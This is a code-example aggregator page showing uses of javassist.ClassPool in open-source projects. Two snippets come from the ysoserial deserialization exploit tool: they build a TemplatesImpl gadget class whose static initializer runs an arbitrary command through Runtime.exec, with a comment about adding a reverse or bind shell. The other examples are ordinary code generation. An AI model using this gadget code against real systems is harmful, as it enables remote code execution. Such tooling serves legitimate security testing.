Examples with ClassPool - javassist.ClassPool

Example 81 with ClassPool

use of javassist.ClassPool in project ysoserial by frohoff.

the class Gadgets method createTemplatesImpl.

public static <T> T createTemplatesImpl(final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory) throws Exception {
    final T templates = tplClass.newInstance();
    // use template gadget class
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    pool.insertClassPath(new ClassClassPath(abstTranslet));
    final CtClass clazz = pool.get(StubTransletPayload.class.getName());
    // run command in static initializer
    // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
    String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\"") + "\");";
    clazz.makeClassInitializer().insertAfter(cmd);
    // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
    clazz.setName("ysoserial.Pwner" + System.nanoTime());
    CtClass superC = pool.get(abstTranslet.getName());
    clazz.setSuperclass(superC);
    final byte[] classBytes = clazz.toBytecode();
    // inject class bytes into instance
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class) });
    // required to make TemplatesImpl happy
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
    return templates;
}

Also used : CtClass(javassist.CtClass) DESERIALIZE_TRANSLET(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET) ClassPool(javassist.ClassPool) ClassClassPath(javassist.ClassClassPath)

Example 82 with ClassPool

use of javassist.ClassPool in project ysoserial by frohoff.

the class RemoteClassLoadingTest method makePayloadClass.

protected byte[] makePayloadClass() {
    try {
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(Exploit.class));
        final CtClass clazz = pool.get(Exploit.class.getName());
        clazz.setName(this.className);
        clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") + "\");");
        return clazz.toBytecode();
    } catch (Exception e) {
        e.printStackTrace();
        return new byte[0];
    }
}

Also used : CtClass(javassist.CtClass) ClassPool(javassist.ClassPool) ClassClassPath(javassist.ClassClassPath) IOException(java.io.IOException)

Example 83 with ClassPool

use of javassist.ClassPool in project duangframework by tcrct.

the class AutoBuildServiceInterface method createInterface.

/**
 * 根据参数，创建接口类文件
 * @param clazz		要创建接口文件的类
 * @param interFaceDirPath  接口文件路径，不能包括文件名
 * @param packagePath 包路径名
 * @return
 */
public static boolean createInterface(Class<?> clazz, String interFaceDirPath, String packagePath) throws Exception {
    if (ToolsKit.isEmpty(interFaceDirPath)) {
        throw new RpcException("interFaceFilePath is null");
    }
    if (interFaceDirPath.contains(".")) {
        throw new RpcException("interFaceFilePath only dir path");
    }
    Set<String> excludedMethodName = ObjectKit.buildExcludedMethodName();
    // 只取public的方法
    Method[] methods = clazz.getMethods();
    String classPath = clazz.getName() + ".";
    StringBuilder sb = new StringBuilder();
    try {
        ClassPool pool = ClassPool.getDefault();
        CtClass cc = pool.get(clazz.getName());
        for (Method method : methods) {
            // 过滤掉Object.class里的公用方法及静态方法
            if (excludedMethodName.contains(method.getName()) || Modifier.isStatic(method.getModifiers())) {
                continue;
            }
            // 反射取出方法里的参数名
            List<String> variableNames = getLocalVariableAttributeName(cc, method);
            sb.append("\t").append(toGenericString(method, variableNames).replace(classPath, "")).append(";").append("\n\n");
        }
        // Service接口名
        String fileName = "I" + clazz.getSimpleName();
        // 创建接口类内容
        String fileContext = createInterfaceContextString(clazz.getName(), fileName, packagePath, sb.toString());
        File interFaceFileDir = new File(interFaceDirPath);
        // 文件夹不存在则创建
        if (!interFaceFileDir.exists() && interFaceFileDir.isDirectory()) {
            logger.warn("dir is not exists, create it...");
            interFaceFileDir.mkdirs();
        }
        File interFaceFile = createInterFaceFileOnDisk(interFaceDirPath, fileName, fileContext);
        if (interFaceFile.isFile()) {
            logger.warn("create " + interFaceDirPath + "/" + fileName + ".java is success!");
        }
        return true;
    } catch (Exception e) {
        throw new RpcException(e.getMessage(), e);
    }
}

Also used : CtClass(javassist.CtClass) RpcException(com.duangframework.core.exceptions.RpcException) ClassPool(javassist.ClassPool) CtMethod(javassist.CtMethod) Method(java.lang.reflect.Method) File(java.io.File) RpcException(com.duangframework.core.exceptions.RpcException) NotFoundException(javassist.NotFoundException) EmptyNullException(com.duangframework.core.exceptions.EmptyNullException)

Example 84 with ClassPool

use of javassist.ClassPool in project systemml by apache.

the class GenerateClassesForMLContext method makeCtClasses.

/**
 * Create compile-time classes required for later class generation.
 */
public static void makeCtClasses() {
    try {
        ClassPool pool = ClassPool.getDefault();
        pool.makeClass(new FileInputStream(new File(destination + File.separator + PATH_TO_MLCONTEXT_CLASS)));
        pool.makeClass(new FileInputStream(new File(destination + File.separator + PATH_TO_MLRESULTS_CLASS)));
        pool.makeClass(new FileInputStream(new File(destination + File.separator + PATH_TO_SCRIPT_CLASS)));
        pool.makeClass(new FileInputStream(new File(destination + File.separator + PATH_TO_SCRIPTTYPE_CLASS)));
        pool.makeClass(new FileInputStream(new File(destination + File.separator + PATH_TO_MATRIX_CLASS)));
        pool.makeClass(new FileInputStream(new File(destination + File.separator + PATH_TO_FRAME_CLASS)));
    } catch (FileNotFoundException e) {
        e.printStackTrace();
    } catch (IOException e) {
        e.printStackTrace();
    } catch (RuntimeException e) {
        e.printStackTrace();
    }
}

Also used : ClassPool(javassist.ClassPool) FileNotFoundException(java.io.FileNotFoundException) IOException(java.io.IOException) File(java.io.File) FileInputStream(java.io.FileInputStream)

Example 85 with ClassPool

use of javassist.ClassPool in project systemml by apache.

the class GenerateClassesForMLContext method addPackageConvenienceMethodsToMLContext.

/**
 * Add methods to MLContext to allow tab-completion to packages contained
 * within the source directory (such as {@code ml.nn()}).
 *
 * @param dirPath
 *            path to source directory (typically, the scripts directory)
 * @param ctMLContext
 *            javassist compile-time class representation of MLContext
 */
public static void addPackageConvenienceMethodsToMLContext(String dirPath, CtClass ctMLContext) {
    try {
        if (!SOURCE.equalsIgnoreCase(dirPath)) {
            return;
        }
        File dir = new File(dirPath);
        File[] subdirs = dir.listFiles(new FileFilter() {

            @Override
            public boolean accept(File f) {
                return f.isDirectory();
            }
        });
        for (File subdir : subdirs) {
            String subDirPath = dirPath + File.separator + subdir.getName();
            if (skipDir(subdir, false)) {
                continue;
            }
            String fullSubDirClassName = dirPathToFullDirClassName(subDirPath);
            ClassPool pool = ClassPool.getDefault();
            CtClass subDirClass = pool.get(fullSubDirClassName);
            String subDirName = subdir.getName();
            subDirName = subDirName.replaceAll("-", "_");
            subDirName = subDirName.toLowerCase();
            System.out.println("Adding " + subDirName + "() to " + ctMLContext.getName());
            String methodBody = "{ " + fullSubDirClassName + " z = new " + fullSubDirClassName + "(); return z; }";
            CtMethod ctMethod = CtNewMethod.make(Modifier.PUBLIC, subDirClass, subDirName, null, null, methodBody, ctMLContext);
            ctMLContext.addMethod(ctMethod);
        }
    } catch (NotFoundException e) {
        e.printStackTrace();
    } catch (CannotCompileException e) {
        e.printStackTrace();
    }
}

Also used : CtClass(javassist.CtClass) ClassPool(javassist.ClassPool) NotFoundException(javassist.NotFoundException) FileNotFoundException(java.io.FileNotFoundException) CannotCompileException(javassist.CannotCompileException) FileFilter(java.io.FileFilter) File(java.io.File) CtMethod(javassist.CtMethod)

Aggregations

ClassPool (javassist.ClassPool)120 CtClass (javassist.CtClass)93 CtMethod (javassist.CtMethod)48 NotFoundException (javassist.NotFoundException)40 CannotCompileException (javassist.CannotCompileException)28 IOException (java.io.IOException)23 LoaderClassPath (javassist.LoaderClassPath)21 CtField (javassist.CtField)20 CtConstructor (javassist.CtConstructor)17 Test (org.junit.Test)17 ClassFile (javassist.bytecode.ClassFile)15 File (java.io.File)13 Method (java.lang.reflect.Method)13 ByteArrayInputStream (java.io.ByteArrayInputStream)12 ConstPool (javassist.bytecode.ConstPool)12 FileNotFoundException (java.io.FileNotFoundException)11 IllegalClassFormatException (java.lang.instrument.IllegalClassFormatException)9 AnnotationsAttribute (javassist.bytecode.AnnotationsAttribute)9 ClassClassPath (javassist.ClassClassPath)7 MethodInfo (javassist.bytecode.MethodInfo)7